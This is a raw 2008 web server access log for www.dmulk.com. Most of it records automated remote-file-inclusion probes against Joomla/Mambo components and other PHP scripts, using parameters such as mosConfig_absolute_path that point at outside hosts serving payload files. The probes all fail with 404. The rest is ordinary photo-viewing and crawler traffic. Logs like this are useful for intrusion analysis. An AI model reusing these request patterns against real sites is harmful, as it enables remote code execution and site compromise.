64.235.52.184 - - [12/Feb/2008:14:53:48 -0800] "GET /logs/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:14:53:50 -0800] "GET /logs/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:14:53:50 -0800] "GET /modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.25.34 - - [12/Feb/2008:14:53:53 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://avvv.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:14:53:58 -0800] "GET /logs/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:14:53:59 -0800] "GET /modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:14:54:00 -0800] "GET /logs/modifyform.html?code=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [12/Feb/2008:14:54:01 -0800] "GET /modifyform.html?code=http://www.sunacoop.gob.ve/images/fbfiles/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:14:54:53 -0800] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:14:54:53 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.66.124.141 - - [12/Feb/2008:14:55:03 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.23.72 - - [12/Feb/2008:14:55:32 -0800] "GET /logs/access_071219.log HTTP/1.0" 200 181961 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:14:56:04 -0800] "GET /logs/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:14:56:06 -0800] "GET /modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.97.207.101 - - [12/Feb/2008:14:56:22 -0800] "GET /logs/access_071219.log//classes/adodbt/sql.php?classes_dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [12/Feb/2008:14:56:29 -0800] "GET /logs/access_071225.log/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:14:57:00 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:14:57:00 -0800] "GET /modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:14:57:01 -0800] "GET /logs/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.102.10.26 - - [12/Feb/2008:14:57:16 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:14:57:55 -0800] "GET /logs/access_080117.log//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:14:58:06 -0800] "GET //index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:14:58:06 -0800] "GET /logs//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.106.20.28 - - [12/Feb/2008:14:58:50 -0800] "GET /logs/access_080108.log/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [12/Feb/2008:14:58:50 -0800] "GET /write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [12/Feb/2008:14:58:50 -0800] "GET /logs/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:14:59:32 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:14:59:53 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.144.91 - - [12/Feb/2008:15:00:17 -0800] "GET /logs/access_080130.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.zaralazgin.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.91 - - [12/Feb/2008:15:00:22 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.zaralazgin.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.91 - - [12/Feb/2008:15:00:23 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.zaralazgin.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:44 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:44 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:45 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:45 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:47 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:47 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:48 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:51 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:53 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:54 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:55 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:56 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:57 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:57 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:59 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:01:59 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:00 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:00 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:02 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:02 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:03 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:04 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:05 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
59.106.20.28 - - [12/Feb/2008:15:02:08 -0800] "GET /logs/access_071225.log/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:38 -0800] "GET /bikes/dteel/2008_02_07/IMG_4451s.JPG HTTP/1.1" 200 291037 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:39 -0800] "GET /bikes/dteel/2008_02_07/IMG_4447s.JPG HTTP/1.1" 200 335611 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:39 -0800] "GET /bikes/dteel/2008_02_07/IMG_4452s.JPG HTTP/1.1" 200 243937 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:41 -0800] "GET /bikes/dteel/2008_02_07/IMG_4456s.JPG HTTP/1.1" 200 275747 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:43 -0800] "GET /bikes/dteel/2008_02_07/IMG_4459s.JPG HTTP/1.1" 200 310940 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:44 -0800] "GET /bikes/dteel/2008_02_07/IMG_4460s.JPG HTTP/1.1" 200 316892 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:02:44 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:46 -0800] "GET /bikes/dteel/2008_02_08/IMG_4473s.JPG HTTP/1.1" 200 189740 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:46 -0800] "GET /bikes/dteel/2008_02_07/IMG_4461s.JPG HTTP/1.1" 200 313284 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
85.234.144.91 - - [12/Feb/2008:15:02:49 -0800] "GET /logs/access_080122.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.zaralazgin.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.26.161.169 - - [12/Feb/2008:15:02:49 -0800] "GET /bikes/dteel/2008_02_08/IMG_4486s.JPG HTTP/1.1" 200 266614 "http://www.st-owners.com/forums/showthread.php?t=32353&page=2" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
202.181.206.50 - - [12/Feb/2008:15:03:23 -0800] "GET /logs/access_080108.log/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [12/Feb/2008:15:03:23 -0800] "GET /write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.206.50 - - [12/Feb/2008:15:03:23 -0800] "GET /logs/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:15:03:59 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:15:04:00 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.28.81 - - [12/Feb/2008:15:05:18 -0800] "GET /retreat1/work/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.181.206.50 - - [12/Feb/2008:15:06:12 -0800] "GET /logs/access_071225.log/write.php?dir=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:06:23 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:06:24 -0800] "GET /modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:06:26 -0800] "GET /logs/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.186.169.183 - - [12/Feb/2008:15:06:31 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:06:50 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:15:08:37 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:08:39 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:08:40 -0800] "GET /modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:08:42 -0800] "GET /logs/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:15:08:47 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.109.240.206 - - [12/Feb/2008:15:08:48 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.send2thailand.com/image/d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.0.141.110 - - [12/Feb/2008:15:08:53 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:15:10:36 -0800] "GET /logs/access_080129.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:15:10:37 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:15:10:56 -0800] "GET /logs/access_080129.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:15:10:57 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:15:12:49 -0800] "GET /logs/access_080130.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.41 - - [12/Feb/2008:15:13:14 -0800] "GET /templates/Official/part_mps.php?template_pathhttp://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
81.177.16.41 - - [12/Feb/2008:15:13:14 -0800] "GET /logs/templates/Official/part_mps.php?template_pathhttp://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
80.70.113.10 - - [12/Feb/2008:15:13:42 -0800] "GET /logs/access.log//index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://bucare.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.243.54.131 - - [12/Feb/2008:15:14:00 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.243.54.131 - - [12/Feb/2008:15:14:01 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
80.243.54.131 - - [12/Feb/2008:15:14:01 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:15:14:18 -0800] "GET /logs/access_080130.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
